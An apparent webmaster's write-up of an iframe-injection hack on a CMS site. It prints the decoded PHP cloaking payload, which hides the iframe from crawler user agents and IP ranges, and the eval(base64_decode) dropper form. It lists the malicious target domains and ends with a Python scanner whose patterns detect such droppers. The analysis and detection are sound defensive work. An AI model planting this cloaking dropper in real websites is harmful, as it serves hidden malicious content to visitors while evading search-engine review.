WordPress, Joomla, Drupal and other sites were hacked: iFrame Injection Attack

I just found the following code in the index.php file located in the site root (the \htdocs\ folder):

eval(base64_decode('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'));

Decoding the base64 string gives the PHP below, which the eval() runs on every request to the page:

error_reporting(0);   // suppress any PHP warning that would reveal the payload in the page
$bot = FALSE ;
// User-agent substrings of crawlers, validators, feed readers and similar tools; any visitor matching one is treated as a bot
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
// (first, last) address pairs of search-engine crawler networks, mostly Google's, with Yahoo and Microsoft
// ranges among them; visitors from these ranges never receive the iframe, so an indexer never sees it
$stop_ips_masks = array(
	array("216.239.32.0","216.239.63.255"),
	array("64.68.80.0"  ,"64.68.87.255"  ),
	array("66.102.0.0",  "66.102.15.255"),
	array("64.233.160.0","64.233.191.255"),
	array("66.249.64.0", "66.249.95.255"),
	array("72.14.192.0", "72.14.255.255"),
	array("209.85.128.0","209.85.255.255"),
	array("198.108.100.192","198.108.100.207"),
	array("173.194.0.0","173.194.255.255"),
	array("216.33.229.144","216.33.229.151"),
	array("216.33.229.160","216.33.229.167"),
	array("209.185.108.128","209.185.108.255"),
	array("216.109.75.80","216.109.75.95"),
	array("64.68.88.0","64.68.95.255"),
	array("64.68.64.64","64.68.64.127"),
	array("64.41.221.192","64.41.221.207"),
	array("74.125.0.0","74.125.255.255"),
	array("65.52.0.0","65.55.255.255"),
	array("74.6.0.0","74.6.255.255"),
	array("67.195.0.0","67.195.255.255"),
	array("72.30.0.0","72.30.255.255"),
	array("38.0.0.0","38.255.255.255")
	);
// Visitor address as an unsigned 32-bit number; "%u" keeps the comparison correct on 32-bit PHP,
// where ip2long() can return a negative integer
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
// Case-sensitive substring match of the visitor's user agent against the list above
foreach ($user_agent_to_filter as $bot_sign){
	if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
// Only ordinary visitors get the hidden iframe; its markup is left out of this post on purpose
if (!$bot) {
echo '<  i fra-me ---removed code for security>';
}

Recent domains used as the iframe target by this malware (all throwaway subdomains under co.cc, cz.cc and vv.cc):

jfgjfr5jdfj.vv.cc, gdsagw3hgsrh.co.cc, jfgdhdfhsdfh.vv.cc, vfsgsh4hxfh.co.cc, ktk4gj.co.cc, gasgshshdh.co.cc, gewherhfdh.co.cc, h345jdfhfchf.co.cc, g2hsjgjgfj.co.cc, hfdhe3hjdf.co.cc, ns34jgdmhfm.co.cc, wrag23hdjsg.co.cc, ds23gfdshgfnf.co.cc, gdsg3whfshf.co.cc, hbsfhwerbxn.co.cc, hfdshwhfh3g.co.cc, gsdgwe3gfnx.co.cc, 3gshsddh.co.cc, hdh4hfdhf.co.cc, gsg3wahfh.co.cc, gsgwsgdsgg.co.cc, ktdi5ejytdjy.co.cc, hdfshtrehsht.co.cc, gdsg34gdsgf.co.cc, gsg3gsgfdsg.co.cc, gagdsgewg.co.cc, ghdsg32hgdf.co.cc, g232sgd.co.cc, fg2fsfsdvg.co.cc, hfdah4hdfhgf.co.cc, dfahwhh4hfh.co.cc, gsagddgsg.co.cc, mghmrm.co.cc, bfda3wgfdhf.co.cc, hfdsh34hdhfg.co.cc, gsdfaghw3hgsfd.co.cc, hfdahwhfdhfgdh.co.cc, hfdsah34hh.co.cc, euy0.co.cc, p6ox.co.cc, 71pp.co.cc, 2d7d.co.cc, uxqt.co.cc, f2hl.co.cc, s4gs.cz.cc, 9rk1.co.cc, gtha.co.cc, icu2.co.cc, fsfbv4gdgdg.cz.cc, v934.co.cc, ghtt5rgff.cz.cc, f9tq.cz.cc, gdfkwiksdk.cz.cc, hdfs4hwdhdf.cz.cc, psyzbq.cz.cc, sdgw3gsdg.vv.cc, 8ieq1w0.cz.cc, gs4gshshfs.vv.cc, gsdha3whfh.vv.cc, bxhbawhgsdfhzwre.vv.cc, geg3gsgdwd.cz.cc, gvonlxto1fj.cz.cc, 023uik6fj8.cz.cc, aixfbap7xo.co.cc, 1og0r6uz0hu.cz.cc, da3gwdgsdg.cz.cc, k74yq3zdgw.co.cc, utjtnw91jy.co.cc, sdfgsdfgsdf.co.cc, jd52b9rz6h.co.cc, 5jeuzfn9la.cz.cc, wgrgwozso9.co.cc, llhquzvvp0.co.cc, gwvmloqs.co.cc, oxvz.co.cc, 7ujj.co.cc, 6p58.co.cc, tapgjiuo.co.cc, y58z.co.cc, fvnv.co.cc, gmmidoet.co.cc, sa1o.co.cc, brliimuc.co.cc, bcmc.co.cc, s5t6.co.cc

First attempt: I edited index.php and fixed it by removing the eval line.
I reset my password and removed all FTP users.
But within two hours the index files were hacked again.

Next attempt: I edited index.php again and removed the eval line.
I reset my password.
Then I changed the file permissions to 444 so that no write access is allowed. I hope this stops code being injected through a backdoor script that may still exist somewhere in my files.

Update after 8 hours:
No sign of further code injection.

UPDATE: After two weeks I reverted the file permissions, and there has been no further sign of malicious code injection.
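Setting index.php to 444 removes the symptom, not the cause: whatever rewrote the file within two hours of the first clean-up is still on the host, and because PHP on shared hosting usually runs as the owner of the files, a backdoor can call chmod() to restore write access whenever it wants. The check a practitioner wants before trusting the site again is a scan of every PHP file under the web root (uploads, theme and plugin directories included) for the same eval(base64_decode(...)) wrapper, decoding whatever it finds. The script below is an added example, not code from the post or from any CMS; the web root it builds in a temporary directory, the shortened cloaking payload, and the example.invalid iframe target are constructed for illustration.

```python
"""Added example: find eval(base64_decode(...)) droppers under a web root and decode
what they execute. Not code from the original post; the sample site is constructed."""
import base64
import binascii
import os
import re
import tempfile

# The dropper exactly as it sat in index.php: eval(base64_decode('<base64>'));
DROPPER_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# Other wrappers that hide code the same way; flagged even when nothing decodes.
SUSPECT_RE = re.compile(
    r"\b(?:gzinflate|gzuncompress|str_rot13|assert)\s*\(\s*base64_decode\s*\("
    r"|preg_replace\s*\(\s*['\"]/.*?/e['\"]",
    re.IGNORECASE,
)
# Fragments of the cloaking payload shown above: one is a weak signal, several together are strong.
CLOAKING_MARKERS = ("error_reporting(0)", "HTTP_USER_AGENT", "ip2long(", "REMOTE_ADDR", "<iframe")

# Constructed stand-in for the real payload (shortened; example.invalid is a hypothetical target).
SAMPLE_PAYLOAD = (
    "error_reporting(0);$bot=FALSE;"
    "if(strpos($_SERVER['HTTP_USER_AGENT'],'bot')!==false){$bot=true;}"
    "if(sprintf('%u',ip2long($_SERVER['REMOTE_ADDR']))>=1113980928){$bot=true;}"
    "if(!$bot){echo '<iframe src=\"http://example.invalid/\" width=1 height=1></iframe>';}"
)


def decode_payload(b64):
    """Decode the quoted argument; None when it is not valid base64."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", b64), validate=True)
    except (ValueError, binascii.Error):
        return None
    return raw.decode("latin-1")


def analyze_source(text):
    """Return one finding per obfuscated call: offset, wrapper, decoded text, markers hit."""
    findings = []
    for m in DROPPER_RE.finditer(text):
        decoded = decode_payload(m.group(1)) or ""
        findings.append({
            "offset": m.start(),
            "wrapper": "eval(base64_decode())",
            "decoded": decoded,
            "markers": [k for k in CLOAKING_MARKERS if k in decoded],
        })
    for m in SUSPECT_RE.finditer(text):
        findings.append({"offset": m.start(), "wrapper": m.group(0), "decoded": "", "markers": []})
    return sorted(findings, key=lambda f: f["offset"])


def scan_tree(root):
    """Walk every PHP file under root, uploads and themes included; map relative path -> findings."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1", newline="") as fh:
                findings = analyze_source(fh.read())
            if findings:
                results[os.path.relpath(path, root)] = findings
    return results


def build_sample_site(root):
    """Write a constructed web root: an infected index.php plus one clean plugin file."""
    b64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    plugin_dir = os.path.join(root, "wp-content", "plugins", "hello")
    os.makedirs(plugin_dir, exist_ok=True)
    with open(os.path.join(root, "index.php"), "w", newline="") as fh:
        fh.write("<?php\neval(base64_decode('%s'));\n/* real front controller follows */\n" % b64)
    with open(os.path.join(plugin_dir, "hello.php"), "w", newline="") as fh:
        fh.write("<?php\nadd_action('init', 'hello_init');\n")


def demo():
    """Build the sample site in a temporary directory, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        results = scan_tree(root)
    for path, findings in sorted(results.items()):
        for f in findings:
            print(f"{path} @ byte {f['offset']}: {f['wrapper']} markers={f['markers']}")
            if f["decoded"]:
                print("  decoded:", f["decoded"][:160])
    return results


if __name__ == "__main__":
    demo()
```

Run it as-is to see the demo against the constructed site, or call scan_tree() on the real document root. Any hit outside index.php is the backdoor worth removing; compare flagged files against a clean copy of the CMS release, and check their modification times against the time the iframe reappeared, before reverting the permissions.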
